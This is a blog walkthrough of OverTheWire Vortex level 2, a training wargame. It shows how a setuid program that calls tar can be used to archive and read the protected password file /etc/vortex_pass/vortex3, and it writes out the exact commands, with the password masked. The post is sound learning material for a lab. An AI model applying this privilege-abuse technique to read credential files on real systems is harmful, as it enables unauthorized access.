Overthewire Vortex Level2

You can find the description of this level here.

It is not hard to figure out, that the process which calls tar command, has the privileges to access the file, which contains the password we need.

So simply calling it with the file we need, and two non-existing file names as parameters:

/vortex/level2 /etc/vortex_pass/vortex3 X Y

will result a tar archive which hopefully contains our file. Lets check it:

ls -lad /tmp/ownership.$$.tar
ls: cannot access /tmp/ownership.11603.tar: No such file or directory

Something went wrong, bash resolves $$ to the pid of the actual shell. Lets ‘protect’ the filename:

ls -lad '/tmp/ownership.$$.tar'
-rw-r--r-- 1 vortex3 vortex2 10240 Nov 19 00:51 /tmp/ownership.$$.tar

Ok, we have the file! Lets dump its content to the console:

tar xf '/tmp/ownership.$$.tar' -O 
********
Advertisements
This entry was posted in Wargame and tagged , , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s